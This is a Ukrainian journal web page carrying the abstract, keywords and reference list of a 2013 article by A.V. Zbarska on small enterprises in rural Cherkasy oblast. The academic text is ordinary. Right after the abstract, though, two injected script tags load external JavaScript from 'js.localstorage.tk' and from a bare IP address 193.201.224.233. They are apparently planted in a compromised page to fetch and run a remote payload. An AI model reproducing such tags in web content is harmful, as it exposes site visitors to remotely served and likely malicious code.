ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 334.012.61-02251(477.62)
Економіка агропромислового виробництва

Соціально-економічний розвиток малих підприємств регіону / Збарська А.В. // Економіка АПК. - 2013. - № 10 - С. 39

Розкрито сутність і організацію діяльності малого підприємництва в сільській місцевості та його специфічні риси. Визначено рівень розвитку малих підприємств в аграрному секторі Черкаської області порівняно з іншими галузями економіки, а також у зіставленні з відповідними показниками сільських районів регіону. Проаналізовано показники економічної ефективності виробництва продукції (виконання робіт, послуг) у малих підприємствах та визначено основні проблеми їх розвитку. Науково обґрунтовано ряд заходів щодо тенденції до нарощування кількості суб’єктів малого підприємництва, їх обсягів реалізованої продукції та створення нових робочих місць. Особливість підприє­мств малого бізнесу полягає в тому, що вони, добре володіючи рівнем попиту на регіональних ринках, виробляють продукцію під за­мовлення. Також малі підприємства стабілізують ринок, залу­чаючи до обороту місцеві ресурси, сприяють розвитку малих міст, зменшуючи транспортні витрати, організують нові робочі місця, тим самим сприяють пом’якшенню соціальної напруги в сільській місцевості. Визначено, що в сільських поселеннях Черкаської області зайнято близько 14% осіб, проте ними у 2011 році одержано прибутку 381,9 млн грн, або у 2,6 раза більше, ніж у всіх малих підприємствах регіону. Табл.: 2. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: мале підприємництво, мале підприємство, конкурентні переваги, місцеві ресурси, розвиток, суб’єкт малого бізнесу, сільське поселення

Список використаних джерел

 1. Статистичний збірник «Діяльність малих підприємств» 2009. – Держкомстат України, Головне управління статистики у Черкаській області. – Черкаси, 2010. – 168 с.
 2. Регіональний розвиток Черкаської області за 2010 рік. Стат. зб. – Держслужба статистики України, Головне управління статистики у Черкаській області. – Черкаси, 2011. – 392 с.
 3. Статистичний щорічник Черкаської області за 2010 рік. – Держслужба статистики України, Головне управління статистики у Черкаській області. – Черкаси, 2011. – 548 с.
 4. Фінансово-господарська діяльність підприємств Черкаської області. Стат. зб. за 2010 рік. – Держслужба статистики України, Головне управління статистики у Черкаській області. – Черкаси, 2011. – 228 с.
 5. Статистичний збірник «Діяльність суб’єктів малого підприємництва» 2010 рік. – К.: Держкомстат України, 2011. – 188 с.
 6. Малік М.Й. До питання сталого розвитку сільських територій / М.Й. Малік // Економіка АПК. – 2008. – № 5. – С.51-55.
 7. Месель-Веселяк В.Я. Аграрний сектор економіки України (стан, минуле і майбутнє) /за ред.: П.Т. Саблука, В.Я. Месель-Веселяка, М.М. Федорова; моногр. – К.: ННЦ ІАЕ,2009. – 1008 с.
 8. Шпичак О.М. Реалізація продукції особистими селянськими господарствами – витрати, ціни, ефективність: моногр. / О.М. Шпичак, І.В. Свиноус. – К.: ННЦІАЕ, 2008. – 300 с.
 9. Збарський В.К. Сталий розвиток сільських територій: проблеми і перспективи // Економіка АПК. – 2010. – № 11. – С. 129-136.
 10. Горьовий В.П. Проблеми поєднання малих, середніх та великих підприємств / В.П. Горьовий, В.К. Збарський // Агроінком. – 2007. – № 7-8. – С. 54-62
 11. Канінський П.К. Організаційно-економічні засади соціального розвитку села / П.К. Канінський //Агроінком. – 2007. – № 1-2. – С.85-87.
 12. Baumol W. The Free-Market Innovation Machine: Analysing the Growth Miracle of Capitalism. – Princeton: Princeton University Press, 2002. – 342 p.
 13. Scherer F., Ross D. Industrial Structure aand Economic Performance. – Boston: Houghton Mifflin, 1990. – 459 p.
 14. P. Santacoloma, A. R?ttger, F. Tartanac. “Business management for small-scale agro-industries” / Food and agriculture organization of the united nations. Rome, 2009 – 112 р.
 15. Peter Fellows, Alexandra Rottger. FAO.2005. Business management for small-scale agro-processors.AGSF Working Document No. 7, Rome.
 16. Fellows, P.J. & Axtell, B. 2001. Opportunities in food processing – setting up and running a small food business. Wageningen, Netherlands, Technical Centre for Agricultural and Rural Co-operation.
Читати статтю: 13_10_43-49.pdf